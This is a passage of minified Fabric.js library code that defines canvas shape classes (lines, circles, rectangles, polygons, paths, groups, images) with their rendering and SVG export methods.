p?j.util.animateColor(w.startValue,w.endValue,w.duration,w):j.util.animate(w)}}),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.object.clone,y={x1:1,x2:1,y1:1,y2:1};function M(p,D){var w=p.origin,x=p.axis1,S=p.axis2,O=p.dimension,U=D.nearest,K=D.center,ee=D.farthest;return function(){switch(this.get(w)){case U:return Math.min(this.get(x),this.get(S));case K:return Math.min(this.get(x),this.get(S))+.5*this.get(O);case ee:return Math.max(this.get(x),this.get(S))}}}g.Line?g.warn("fabric.Line is already defined"):(g.Line=g.util.createClass(g.Object,{type:"line",x1:0,y1:0,x2:0,y2:0,cacheProperties:g.Object.prototype.cacheProperties.concat("x1","x2","y1","y2"),initialize:function(p,D){p||(p=[0,0,0,0]),this.callSuper("initialize",D),this.set("x1",p[0]),this.set("y1",p[1]),this.set("x2",p[2]),this.set("y2",p[3]),this._setWidthHeight(D)},_setWidthHeight:function(p){p||(p={}),this.width=Math.abs(this.x2-this.x1),this.height=Math.abs(this.y2-this.y1),this.left="left"in p?p.left:this._getLeftToOriginX(),this.top="top"in p?p.top:this._getTopToOriginY()},_set:function(p,D){return this.callSuper("_set",p,D),void 0!==y[p]&&this._setWidthHeight(),this},_getLeftToOriginX:M({origin:"originX",axis1:"x1",axis2:"x2",dimension:"width"},{nearest:"left",center:"center",farthest:"right"}),_getTopToOriginY:M({origin:"originY",axis1:"y1",axis2:"y2",dimension:"height"},{nearest:"top",center:"center",farthest:"bottom"}),_render:function(p){p.beginPath();var D=this.calcLinePoints();p.moveTo(D.x1,D.y1),p.lineTo(D.x2,D.y2),p.lineWidth=this.strokeWidth;var w=p.strokeStyle;p.strokeStyle=this.stroke||p.fillStyle,this.stroke&&this._renderStroke(p),p.strokeStyle=w},_findCenterFromElement:function(){return{x:(this.x1+this.x2)/2,y:(this.y1+this.y2)/2}},toObject:function(p){return b(this.callSuper("toObject",p),this.calcLinePoints())},_getNonTransformedDimensions:function(){var p=this.callSuper("_getNonTransformedDimensions");return"butt"===this.strokeLineCap&&(0===this.width&&(p.y-=this.strokeWidth),0===this.height&&(p.x-=this.strokeWidth)),p},calcLinePoints:function(){var p=this.x1<=this.x2?-1:1,D=this.y1<=this.y2?-1:1;return{x1:p*this.width*.5,x2:p*this.width*-.5,y1:D*this.height*.5,y2:D*this.height*-.5}},_toSVG:function(){var p=this.calcLinePoints();return["<line ","COMMON_PARTS",'x1="',p.x1,'" y1="',p.y1,'" x2="',p.x2,'" y2="',p.y2,'" />\n']}}),g.Line.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("x1 y1 x2 y2".split(" ")),g.Line.fromElement=function(p,D,w){w=w||{};var x=g.parseAttributes(p,g.Line.ATTRIBUTE_NAMES);D(new g.Line([x.x1||0,x.y1||0,x.x2||0,x.y2||0],b(x,w)))},g.Line.fromObject=function(p,D){var x=_(p,!0);x.points=[p.x1,p.y1,p.x2,p.y2],g.Object._fromObject("Line",x,function w(S){delete S.points,D&&D(S)},"points")})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.degreesToRadians;g.Circle?g.warn("fabric.Circle is already defined."):(g.Circle=g.util.createClass(g.Object,{type:"circle",radius:0,startAngle:0,endAngle:360,cacheProperties:g.Object.prototype.cacheProperties.concat("radius","startAngle","endAngle"),_set:function(y,M){return this.callSuper("_set",y,M),"radius"===y&&this.setRadius(M),this},toObject:function(y){return this.callSuper("toObject",["radius","startAngle","endAngle"].concat(y))},_toSVG:function(){var y,D=(this.endAngle-this.startAngle)%360;if(0===D)y=["<circle ","COMMON_PARTS",'cx="0" cy="0" ','r="',this.radius,'" />\n'];else{var w=b(this.startAngle),x=b(this.endAngle),S=this.radius;y=['<path d="M '+g.util.cos(w)*S+" "+g.util.sin(w)*S," A "+S+" "+S," 0 ",+(D>180?"1":"0")+" 1"," "+g.util.cos(x)*S+" "+g.util.sin(x)*S,'" ',"COMMON_PARTS"," />\n"]}return y},_render:function(y){y.beginPath(),y.arc(0,0,this.radius,b(this.startAngle),b(this.endAngle),!1),this._renderPaintInOrder(y)},getRadiusX:function(){return this.get("radius")*this.get("scaleX")},getRadiusY:function(){return this.get("radius")*this.get("scaleY")},setRadius:function(y){return this.radius=y,this.set("width",2*y).set("height",2*y)}}),g.Circle.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("cx cy r".split(" ")),g.Circle.fromElement=function(y,M){var p=g.parseAttributes(y,g.Circle.ATTRIBUTE_NAMES);if(!function _(y){return"radius"in y&&y.radius>=0}(p))throw new Error("value of `r` attribute is required and can not be negative");p.left=(p.left||0)-p.radius,p.top=(p.top||0)-p.radius,M(new g.Circle(p))},g.Circle.fromObject=function(y,M){g.Object._fromObject("Circle",y,M)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});g.Triangle?g.warn("fabric.Triangle is already defined"):(g.Triangle=g.util.createClass(g.Object,{type:"triangle",width:100,height:100,_render:function(b){var _=this.width/2,y=this.height/2;b.beginPath(),b.moveTo(-_,y),b.lineTo(0,-y),b.lineTo(_,y),b.closePath(),this._renderPaintInOrder(b)},_toSVG:function(){var b=this.width/2,_=this.height/2;return["<polygon ","COMMON_PARTS",'points="',[-b+" "+_,"0 "+-_,b+" "+_].join(","),'" />']}}),g.Triangle.fromObject=function(b,_){return g.Object._fromObject("Triangle",b,_)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=2*Math.PI;g.Ellipse?g.warn("fabric.Ellipse is already defined."):(g.Ellipse=g.util.createClass(g.Object,{type:"ellipse",rx:0,ry:0,cacheProperties:g.Object.prototype.cacheProperties.concat("rx","ry"),initialize:function(_){this.callSuper("initialize",_),this.set("rx",_&&_.rx||0),this.set("ry",_&&_.ry||0)},_set:function(_,y){switch(this.callSuper("_set",_,y),_){case"rx":this.rx=y,this.set("width",2*y);break;case"ry":this.ry=y,this.set("height",2*y)}return this},getRx:function(){return this.get("rx")*this.get("scaleX")},getRy:function(){return this.get("ry")*this.get("scaleY")},toObject:function(_){return this.callSuper("toObject",["rx","ry"].concat(_))},_toSVG:function(){return["<ellipse ","COMMON_PARTS",'cx="0" cy="0" ','rx="',this.rx,'" ry="',this.ry,'" />\n']},_render:function(_){_.beginPath(),_.save(),_.transform(1,0,0,this.ry/this.rx,0,0),_.arc(0,0,this.rx,0,b,!1),_.restore(),this._renderPaintInOrder(_)}}),g.Ellipse.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("cx cy rx ry".split(" ")),g.Ellipse.fromElement=function(_,y){var M=g.parseAttributes(_,g.Ellipse.ATTRIBUTE_NAMES);M.left=(M.left||0)-M.rx,M.top=(M.top||0)-M.ry,y(new g.Ellipse(M))},g.Ellipse.fromObject=function(_,y){g.Object._fromObject("Ellipse",_,y)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend;g.Rect?g.warn("fabric.Rect is already defined"):(g.Rect=g.util.createClass(g.Object,{stateProperties:g.Object.prototype.stateProperties.concat("rx","ry"),type:"rect",rx:0,ry:0,cacheProperties:g.Object.prototype.cacheProperties.concat("rx","ry"),initialize:function(_){this.callSuper("initialize",_),this._initRxRy()},_initRxRy:function(){this.rx&&!this.ry?this.ry=this.rx:this.ry&&!this.rx&&(this.rx=this.ry)},_render:function(_){var y=this.rx?Math.min(this.rx,this.width/2):0,M=this.ry?Math.min(this.ry,this.height/2):0,p=this.width,D=this.height,w=-this.width/2,x=-this.height/2,S=0!==y||0!==M,O=.4477152502;_.beginPath(),_.moveTo(w+y,x),_.lineTo(w+p-y,x),S&&_.bezierCurveTo(w+p-O*y,x,w+p,x+O*M,w+p,x+M),_.lineTo(w+p,x+D-M),S&&_.bezierCurveTo(w+p,x+D-O*M,w+p-O*y,x+D,w+p-y,x+D),_.lineTo(w+y,x+D),S&&_.bezierCurveTo(w+O*y,x+D,w,x+D-O*M,w,x+D-M),_.lineTo(w,x+M),S&&_.bezierCurveTo(w,x+O*M,w+O*y,x,w+y,x),_.closePath(),this._renderPaintInOrder(_)},toObject:function(_){return this.callSuper("toObject",["rx","ry"].concat(_))},_toSVG:function(){return["<rect ","COMMON_PARTS",'x="',-this.width/2,'" y="',-this.height/2,'" rx="',this.rx,'" ry="',this.ry,'" width="',this.width,'" height="',this.height,'" />\n']}}),g.Rect.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat("x y rx ry width height".split(" ")),g.Rect.fromElement=function(_,y,M){if(!_)return y(null);M=M||{};var p=g.parseAttributes(_,g.Rect.ATTRIBUTE_NAMES);p.left=p.left||0,p.top=p.top||0,p.height=p.height||0,p.width=p.width||0;var D=new g.Rect(b(M?g.util.object.clone(M):{},p));D.visible=D.visible&&D.width>0&&D.height>0,y(D)},g.Rect.fromObject=function(_,y){return g.Object._fromObject("Rect",_,y)})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.array.min,y=g.util.array.max,M=g.util.toFixed,p=g.util.projectStrokeOnPoints;g.Polyline?g.warn("fabric.Polyline is already defined"):(g.Polyline=g.util.createClass(g.Object,{type:"polyline",points:null,exactBoundingBox:!1,cacheProperties:g.Object.prototype.cacheProperties.concat("points"),initialize:function(D,w){w=w||{},this.points=D||[],this.callSuper("initialize",w),this._setPositionDimensions(w)},_projectStrokeOnPoints:function(){return p(this.points,this,!0)},_setPositionDimensions:function(D){var x,w=this._calcDimensions(D),S=this.exactBoundingBox?this.strokeWidth:0;this.width=w.width-S,this.height=w.height-S,D.fromSVG||(x=this.translateToGivenOrigin({x:w.left-this.strokeWidth/2+S/2,y:w.top-this.strokeWidth/2+S/2},"left","top",this.originX,this.originY)),void 0===D.left&&(this.left=D.fromSVG?w.left:x.x),void 0===D.top&&(this.top=D.fromSVG?w.top:x.y),this.pathOffset={x:w.left+this.width/2+S/2,y:w.top+this.height/2+S/2}},_calcDimensions:function(){var D=this.exactBoundingBox?this._projectStrokeOnPoints():this.points,w=_(D,"x")||0,x=_(D,"y")||0;return{left:w,top:x,width:(y(D,"x")||0)-w,height:(y(D,"y")||0)-x}},toObject:function(D){return b(this.callSuper("toObject",D),{points:this.points.concat()})},_toSVG:function(){for(var D=[],w=this.pathOffset.x,x=this.pathOffset.y,S=g.Object.NUM_FRACTION_DIGITS,O=0,U=this.points.length;O<U;O++)D.push(M(this.points[O].x-w,S),",",M(this.points[O].y-x,S)," ");return["<"+this.type+" ","COMMON_PARTS",'points="',D.join(""),'" />\n']},commonRender:function(D){var w,x=this.points.length,S=this.pathOffset.x,O=this.pathOffset.y;if(!x||isNaN(this.points[x-1].y))return!1;D.beginPath(),D.moveTo(this.points[0].x-S,this.points[0].y-O);for(var U=0;U<x;U++)D.lineTo((w=this.points[U]).x-S,w.y-O);return!0},_render:function(D){!this.commonRender(D)||this._renderPaintInOrder(D)},complexity:function(){return this.get("points").length}}),g.Polyline.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat(),g.Polyline.fromElementGenerator=function(D){return function(w,x,S){if(!w)return x(null);S||(S={});var O=g.parsePointsAttribute(w.getAttribute("points")),U=g.parseAttributes(w,g[D].ATTRIBUTE_NAMES);U.fromSVG=!0,x(new g[D](O,b(U,S)))}},g.Polyline.fromElement=g.Polyline.fromElementGenerator("Polyline"),g.Polyline.fromObject=function(D,w){return g.Object._fromObject("Polyline",D,w,"points")})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.projectStrokeOnPoints;g.Polygon?g.warn("fabric.Polygon is already defined"):(g.Polygon=g.util.createClass(g.Polyline,{type:"polygon",_projectStrokeOnPoints:function(){return b(this.points,this)},_render:function(_){!this.commonRender(_)||(_.closePath(),this._renderPaintInOrder(_))}}),g.Polygon.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat(),g.Polygon.fromElement=g.Polyline.fromElementGenerator("Polygon"),g.Polygon.fromObject=function(_,y){g.Object._fromObject("Polygon",_,y,"points")})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.array.min,_=g.util.array.max,y=g.util.object.extend,M=g.util.object.clone,p=g.util.toFixed;g.Path?g.warn("fabric.Path is already defined"):(g.Path=g.util.createClass(g.Object,{type:"path",path:null,cacheProperties:g.Object.prototype.cacheProperties.concat("path","fillRule"),stateProperties:g.Object.prototype.stateProperties.concat("path"),initialize:function(D,w){delete(w=M(w||{})).path,this.callSuper("initialize",w),this._setPath(D||[],w)},_setPath:function(D,w){this.path=g.util.makePathSimpler(Array.isArray(D)?D:g.util.parsePath(D)),g.Polyline.prototype._setPositionDimensions.call(this,w||{})},_renderPathCommands:function(D){var w,x=0,S=0,O=0,U=0,se=-this.pathOffset.x,ve=-this.pathOffset.y;D.beginPath();for(var le=0,ye=this.path.length;le<ye;++le)switch(w=this.path[le],w[0]){case"L":D.lineTo((O=w[1])+se,(U=w[2])+ve);break;case"M":x=O=w[1],S=U=w[2],D.moveTo(O+se,U+ve);break;case"C":D.bezierCurveTo(w[1]+se,w[2]+ve,w[3]+se,w[4]+ve,(O=w[5])+se,(U=w[6])+ve);break;case"Q":D.quadraticCurveTo(w[1]+se,w[2]+ve,w[3]+se,w[4]+ve),O=w[3],U=w[4];break;case"z":case"Z":O=x,U=S,D.closePath()}},_render:function(D){this._renderPathCommands(D),this._renderPaintInOrder(D)},toString:function(){return"#<fabric.Path ("+this.complexity()+'): { "top": '+this.top+', "left": '+this.left+" }>"},toObject:function(D){return y(this.callSuper("toObject",D),{path:this.path.map(function(w){return w.slice()})})},toDatalessObject:function(D){var w=this.toObject(["sourcePath"].concat(D));return w.sourcePath&&delete w.path,w},_toSVG:function(){return["<path ","COMMON_PARTS",'d="',g.util.joinPath(this.path),'" stroke-linecap="round" ',"/>\n"]},_getOffsetTransform:function(){var D=g.Object.NUM_FRACTION_DIGITS;return" translate("+p(-this.pathOffset.x,D)+", "+p(-this.pathOffset.y,D)+")"},toClipPathSVG:function(D){var w=this._getOffsetTransform();return"\t"+this._createBaseClipPathSVGMarkup(this._toSVG(),{reviver:D,additionalTransform:w})},toSVG:function(D){var w=this._getOffsetTransform();return this._createBaseSVGMarkup(this._toSVG(),{reviver:D,additionalTransform:w})},complexity:function(){return this.path.length},_calcDimensions:function(){for(var x,ee,D=[],w=[],S=0,O=0,U=0,K=0,se=0,ve=this.path.length;se<ve;++se){switch((x=this.path[se])[0]){case"L":U=x[1],K=x[2],ee=[];break;case"M":S=U=x[1],O=K=x[2],ee=[];break;case"C":ee=g.util.getBoundsOfCurve(U,K,x[1],x[2],x[3],x[4],x[5],x[6]),U=x[5],K=x[6];break;case"Q":ee=g.util.getBoundsOfCurve(U,K,x[1],x[2],x[1],x[2],x[3],x[4]),U=x[3],K=x[4];break;case"z":case"Z":U=S,K=O}ee.forEach(function(v){D.push(v.x),w.push(v.y)}),D.push(U),w.push(K)}var le=b(D)||0,ye=b(w)||0;return{left:le,top:ye,width:(_(D)||0)-le,height:(_(w)||0)-ye}}}),g.Path.fromObject=function(D,w){"string"==typeof D.sourcePath?g.loadSVGFromURL(D.sourcePath,function(S){var O=S[0];O.setOptions(D),D.clipPath?g.util.enlivenObjects([D.clipPath],function(U){O.clipPath=U[0],w&&w(O)}):w&&w(O)}):g.Object._fromObject("Path",D,w,"path")},g.Path.ATTRIBUTE_NAMES=g.SHARED_ATTRIBUTES.concat(["d"]),g.Path.fromElement=function(D,w,x){var S=g.parseAttributes(D,g.Path.ATTRIBUTE_NAMES);S.fromSVG=!0,w(new g.Path(S.d,y(S,x)))})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.array.min,_=g.util.array.max;g.Group||(g.Group=g.util.createClass(g.Object,g.Collection,{type:"group",strokeWidth:0,subTargetCheck:!1,cacheProperties:[],useSetOnGroup:!1,initialize:function(y,M,p){M=M||{},this._objects=[],p&&this.callSuper("initialize",M),this._objects=y||[];for(var D=this._objects.length;D--;)this._objects[D].group=this;if(p)this._updateObjectsACoords();else{var w=M&&M.centerPoint;void 0!==M.originX&&(this.originX=M.originX),void 0!==M.originY&&(this.originY=M.originY),w||this._calcBounds(),this._updateObjectsCoords(w),delete M.centerPoint,this.callSuper("initialize",M)}this.setCoords()},_updateObjectsACoords:function(){for(var M=this._objects.length;M--;)this._objects[M].setCoords(!0)},_updateObjectsCoords:function(M){M=M||this.getCenterPoint();for(var p=this._objects.length;p--;)this._updateObjectCoords(this._objects[p],M)},_updateObjectCoords:function(y,M){y.set({left:y.left-M.x,top:y.top-M.y}),y.group=this,y.setCoords(!0)},toString:function(){return"#<fabric.Group: ("+this.complexity()+")>"},addWithUpdate:function(y){var M=!!this.group;return this._restoreObjectsState(),g.util.resetObjectTransform(this),y&&(M&&g.util.removeTransformFromObject(y,this.group.calcTransformMatrix()),this._objects.push(y),y.group=this,y._set("canvas",this.canvas)),this._calcBounds(),this._updateObjectsCoords(),this.dirty=!0,M?this.group.addWithUpdate():this.setCoords(),this},removeWithUpdate:function(y){return this._restoreObjectsState(),g.util.resetObjectTransform(this),this.remove(y),this._calcBounds(),this._updateObjectsCoords(),this.setCoords(),this.dirty=!0,this},_onObjectAdded:function(y){this.dirty=!0,y.group=this,y._set("canvas",this.canvas)},_onObjectRemoved:function(y){this.dirty=!0,delete y.group},_set:function(y,M){var p=this._objects.length;if(this.useSetOnGroup)for(;p--;)this._objects[p].setOnGroup(y,M);if("canvas"===y)for(;p--;)this._objects[p]._set(y,M);g.Object.prototype._set.call(this,y,M)},toObject:function(y){var M=this.includeDefaultValues,p=this._objects.filter(function(w){return!w.excludeFromExport}).map(function(w){var x=w.includeDefaultValues;w.includeDefaultValues=M;var S=w.toObject(y);return w.includeDefaultValues=x,S}),D=g.Object.prototype.toObject.call(this,y);return D.objects=p,D},toDatalessObject:function(y){var M,p=this.sourcePath;if(p)M=p;else{var D=this.includeDefaultValues;M=this._objects.map(function(x){var S=x.includeDefaultValues;x.includeDefaultValues=D;var O=x.toDatalessObject(y);return x.includeDefaultValues=S,O})}var w=g.Object.prototype.toDatalessObject.call(this,y);return w.objects=M,w},render:function(y){this._transformDone=!0,this.callSuper("render",y),this._transformDone=!1},shouldCache:function(){var y=g.Object.prototype.shouldCache.call(this);if(y)for(var M=0,p=this._objects.length;M<p;M++)if(this._objects[M].willDrawShadow())return this.ownCaching=!1,!1;return y},willDrawShadow:function(){if(g.Object.prototype.willDrawShadow.call(this))return!0;for(var y=0,M=this._objects.length;y<M;y++)if(this._objects[y].willDrawShadow())return!0;return!1},isOnACache:function(){return this.ownCaching||this.group&&this.group.isOnACache()},drawObject:function(y){for(var M=0,p=this._objects.length;M<p;M++)this._objects[M].render(y);this._drawClipPath(y,this.clipPath)},isCacheDirty:function(y){if(this.callSuper("isCacheDirty",y))return!0;if(!this.statefullCache)return!1;for(var M=0,p=this._objects.length;M<p;M++)if(this._objects[M].isCacheDirty(!0)){if(this._cacheCanvas){var D=this.cacheWidth/this.zoomX,w=this.cacheHeight/this.zoomY;this._cacheContext.clearRect(-D/2,-w/2,D,w)}return!0}return!1},_restoreObjectsState:function(){var y=this.calcOwnMatrix();return this._objects.forEach(function(M){g.util.addTransformToObject(M,y),delete M.group,M.setCoords()}),this},destroy:function(){return this._objects.forEach(function(y){y.set("dirty",!0)}),this._restoreObjectsState()},dispose:function(){this.callSuper("dispose"),this.forEachObject(function(y){y.dispose&&y.dispose()}),this._objects=[]},toActiveSelection:function(){if(this.canvas){var y=this._objects,M=this.canvas;this._objects=[];var p=this.toObject();delete p.objects;var D=new g.ActiveSelection([]);return D.set(p),D.type="activeSelection",M.remove(this),y.forEach(function(w){w.group=D,w.dirty=!0,M.add(w)}),D.canvas=M,D._objects=y,M._activeObject=D,D.setCoords(),D}},ungroupOnCanvas:function(){return this._restoreObjectsState()},setObjectsCoords:function(){return this.forEachObject(function(M){M.setCoords(!0)}),this},_calcBounds:function(y){for(var D,w,x,K,M=[],p=[],S=["tr","br","bl","tl"],O=0,U=this._objects.length,ee=S.length;O<U;++O){for(x=(D=this._objects[O]).calcACoords(),K=0;K<ee;K++)M.push(x[w=S[K]].x),p.push(x[w].y);D.aCoords=x}this._getBounds(M,p,y)},_getBounds:function(y,M,p){var D=new g.Point(b(y),b(M)),w=new g.Point(_(y),_(M)),x=D.y||0,S=D.x||0,U=w.y-D.y||0;this.width=w.x-D.x||0,this.height=U,p||this.setPositionByOrigin({x:S,y:x},"left","top")},_toSVG:function(y){for(var M=["<g ","COMMON_PARTS"," >\n"],p=0,D=this._objects.length;p<D;p++)M.push("\t\t",this._objects[p].toSVG(y));return M.push("</g>\n"),M},getSvgStyles:function(){var M=this.visible?"":" visibility: hidden;";return[void 0!==this.opacity&&1!==this.opacity?"opacity: "+this.opacity+";":"",this.getSvgFilter(),M].join("")},toClipPathSVG:function(y){for(var M=[],p=0,D=this._objects.length;p<D;p++)M.push("\t",this._objects[p].toClipPathSVG(y));return this._createBaseClipPathSVGMarkup(M,{reviver:y})}}),g.Group.fromObject=function(y,M){var p=y.objects,D=g.util.object.clone(y,!0);delete D.objects,"string"!=typeof p?g.util.enlivenObjects(p,function(w){g.util.enlivenObjectEnlivables(y,D,function(){M&&M(new g.Group(w,D,!0))})}):g.loadSVGFromURL(p,function(w){var x=g.util.groupSVGElements(w,y,p),S=D.clipPath;delete D.clipPath,x.set(D),S?g.util.enlivenObjects([S],function(O){x.clipPath=O[0],M&&M(x)}):M&&M(x)})})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});g.ActiveSelection||(g.ActiveSelection=g.util.createClass(g.Group,{type:"activeSelection",initialize:function(b,_){_=_||{},this._objects=b||[];for(var y=this._objects.length;y--;)this._objects[y].group=this;_.originX&&(this.originX=_.originX),_.originY&&(this.originY=_.originY),this._calcBounds(),this._updateObjectsCoords(),g.Object.prototype.initialize.call(this,_),this.setCoords()},toGroup:function(){var b=this._objects.concat();this._objects=[];var _=g.Object.prototype.toObject.call(this),y=new g.Group([]);if(delete _.type,y.set(_),b.forEach(function(p){p.canvas.remove(p),p.group=y}),y._objects=b,!this.canvas)return y;var M=this.canvas;return M.add(y),M._activeObject=y,y.setCoords(),y},onDeselect:function(){return this.destroy(),!1},toString:function(){return"#<fabric.ActiveSelection: ("+this.complexity()+")>"},shouldCache:function(){return!1},isOnACache:function(){return!1},_renderControls:function(b,_,y){b.save(),b.globalAlpha=this.isMoving?this.borderOpacityWhenMoving:1,this.callSuper("_renderControls",b,_),void 0===(y=y||{}).hasControls&&(y.hasControls=!1),y.forActiveSelection=!0;for(var M=0,p=this._objects.length;M<p;M++)this._objects[M]._renderControls(b,y);b.restore()}}),g.ActiveSelection.fromObject=function(b,_){g.util.enlivenObjects(b.objects,function(y){delete b.objects,_&&_(new g.ActiveSelection(y,b,!0))})})}(we),function(E){"use strict";var g=j.util.object.extend;E.fabric||(E.fabric={}),E.fabric.Image?j.warn("fabric.Image is already defined."):(j.Image=j.util.createClass(j.Object,{type:"image",strokeWidth:0,srcFromAttribute:!1,_lastScaleX:1,_lastScaleY:1,_filterScalingX:1,_filterScalingY:1,minimumScaleTrigger:.5,stateProperties:j.Object.prototype.stateProperties.concat("cropX","cropY"),cacheProperties:j.Object.prototype.cacheProperties.concat("cropX","cropY"),cacheKey:"",cropX:0,cropY:0,imageSmoothing:!0,initialize:function(b,_){_||(_={}),this.filters=[],this.cacheKey="texture"+j.Object.__uid++,this.callSuper("initialize",_),this._initElement(b,_)},getElement:function(){return this._element||{}},setElement:function(b,_){return this.removeTexture(this.cacheKey),this.removeTexture(this.cacheKey+"_filtered"),this._element=b,this._originalElement=b,this._initConfig(_),0!==this.filters.length&&this.applyFilters(),this.resizeFilter&&this.applyResizeFilters(),this},removeTexture:function(b){var _=j.filterBackend;_&&_.evictCachesForKey&&_.evictCachesForKey(b)},dispose:function(){this.callSuper("dispose"),this.removeTexture(this.cacheKey),this.removeTexture(this.cacheKey+"_filtered"),this._cacheContext=void 0,["_originalElement","_element","_filteredEl","_cacheCanvas"].forEach(function(b){j.util.cleanUpJsdomNode(this[b]),this[b]=void 0}.bind(this))},getCrossOrigin:function(){return this._originalElement&&(this._originalElement.crossOrigin||null)},getOriginalSize:function(){var b=this.getElement();return{width:b.naturalWidth||b.width,height:b.naturalHeight||b.height}},_stroke:function(b){if(this.stroke&&0!==this.strokeWidth){var _=this.width/2,y=this.height/2;b.beginPath(),b.moveTo(-_,-y),b.lineTo(_,-y),b.lineTo(_,y),b.lineTo(-_,y),b.lineTo(-_,-y),b.closePath()}},toObject:function(b){var _=[];this.filters.forEach(function(M){M&&_.push(M.toObject())});var y=g(this.callSuper("toObject",["cropX","cropY"].concat(b)),{src:this.getSrc(),crossOrigin:this.getCrossOrigin(),filters:_});return this.resizeFilter&&(y.resizeFilter=this.resizeFilter.toObject()),y},hasCrop:function(){return this.cropX||this.cropY||this.width<this._element.width||this.height<this._element.height},_toSVG:function(){var y,b=[],_=[],M=this._element,p=-this.width/2,D=-this.height/2,w="",x="";if(!M)return[];if(this.hasCrop()){var S=j.Object.__uid++;b.push('<clipPath id="imageCrop_'+S+'">\n','\t<rect x="'+p+'" y="'+D+'" width="'+this.width+'" height="'+this.height+'" />\n',"</clipPath>\n"),w=' clip-path="url(#imageCrop_'+S+')" '}if(this.imageSmoothing||(x='" image-rendering="optimizeSpeed'),_.push("\t<image ","COMMON_PARTS",'xlink:href="',this.getSvgSrc(!0),'" x="',p-this.cropX,'" y="',D-this.cropY,'" width="',M.width||M.naturalWidth,'" height="',M.height||M.height,x,'"',w,"></image>\n"),this.stroke||this.strokeDashArray){var O=this.fill;this.fill=null,y=["\t<rect ",'x="',p,'" y="',D,'" width="',this.width,'" height="',this.height,'" style="',this.getSvgStyles(),'"/>\n'],this.fill=O}return"fill"!==this.paintFirst?b.concat(y,_):b.concat(_,y)},getSrc:function(b){var _=b?this._element:this._originalElement;return _?_.toDataURL?_.toDataURL():this.srcFromAttribute?_.getAttribute("src"):_.src:this.src||""},setSrc:function(b,_,y){return j.util.loadImage(b,function(M,p){this.setElement(M,y),this._setWidthHeight(),_&&_(this,p)},this,y&&y.crossOrigin),this},toString:function(){return'#<fabric.Image: { src: "'+this.getSrc()+'" }>'},applyResizeFilters:function(){var b=this.resizeFilter,_=this.minimumScaleTrigger,y=this.getTotalObjectScaling(),M=y.scaleX,p=y.scaleY,D=this._filteredEl||this._originalElement;if(this.group&&this.set("dirty",!0),!b||M>_&&p>_)return this._element=D,this._filterScalingX=1,this._filterScalingY=1,this._lastScaleX=M,void(this._lastScaleY=p);j.filterBackend||(j.filterBackend=j.initFilterBackend());var w=j.util.createCanvasElement(),x=this._filteredEl?this.cacheKey+"_filtered":this.cacheKey,S=D.width,O=D.height;w.width=S,w.height=O,this._element=w,this._lastScaleX=b.scaleX=M,this._lastScaleY=b.scaleY=p,j.filterBackend.applyFilters([b],D,S,O,this._element,x),this._filterScalingX=w.width/this._originalElement.width,this._filterScalingY=w.height/this._originalElement.height},applyFilters:function(b){if(b=(b=b||this.filters||[]).filter(function(D){return D&&!D.isNeutralState()}),this.set("dirty",!0),this.removeTexture(this.cacheKey+"_filtered"),0===b.length)return this._element=this._originalElement,this._filteredEl=null,this._filterScalingX=1,this._filterScalingY=1,this;var _=this._originalElement,y=_.naturalWidth||_.width,M=_.naturalHeight||_.height;if(this._element===this._originalElement){var p=j.util.createCanvasElement();p.width=y,p.height=M,this._element=p,this._filteredEl=p}else this._element=this._filteredEl,this._filteredEl.getContext("2d").clearRect(0,0,y,M),this._lastScaleX=1,this._lastScaleY=1;return j.filterBackend||(j.filterBackend=j.initFilterBackend()),j.filterBackend.applyFilters(b,this._originalElement,y,M,this._element,this.cacheKey),(this._originalElement.width!==this._element.width||this._originalElement.height!==this._element.height)&&(this._filterScalingX=this._element.width/this._originalElement.width,this._filterScalingY=this._element.height/this._originalElement.height),this},_render:function(b){j.util.setImageSmoothing(b,this.imageSmoothing),!0!==this.isMoving&&this.resizeFilter&&this._needsResize()&&this.applyResizeFilters(),this._stroke(b),this._renderPaintInOrder(b)},drawCacheOnCanvas:function(b){j.util.setImageSmoothing(b,this.imageSmoothing),j.Object.prototype.drawCacheOnCanvas.call(this,b)},shouldCache:function(){return this.needsItsOwnCache()},_renderFill:function(b){var _=this._element;if(_){var y=this._filterScalingX,M=this._filterScalingY,p=this.width,D=this.height,w=Math.min,x=Math.max,S=x(this.cropX,0),O=x(this.cropY,0),U=_.naturalWidth||_.width,K=_.naturalHeight||_.height,ee=S*y,se=O*M,ve=w(p*y,U-ee),le=w(D*M,K-se),ye=-p/2,z=-D/2,l=w(p,U/y-S),f=w(D,K/M-O);_&&b.drawImage(_,ee,se,ve,le,ye,z,l,f)}},_needsResize:function(){var b=this.getTotalObjectScaling();return b.scaleX!==this._lastScaleX||b.scaleY!==this._lastScaleY},_resetWidthHeight:function(){this.set(this.getOriginalSize())},_initElement:function(b,_){this.setElement(j.util.getById(b),_),j.util.addClass(this.getElement(),j.Image.CSS_CANVAS)},_initConfig:function(b){b||(b={}),this.setOptions(b),this._setWidthHeight(b)},_initFilters:function(b,_){b&&b.length?j.util.enlivenObjects(b,function(y){_&&_(y)},"fabric.Image.filters"):_&&_()},_setWidthHeight:function(b){b||(b={});var _=this.getElement();this.width=b.width||_.naturalWidth||_.width||0,this.height=b.height||_.naturalHeight||_.height||0},parsePreserveAspectRatioAttribute:function(){var 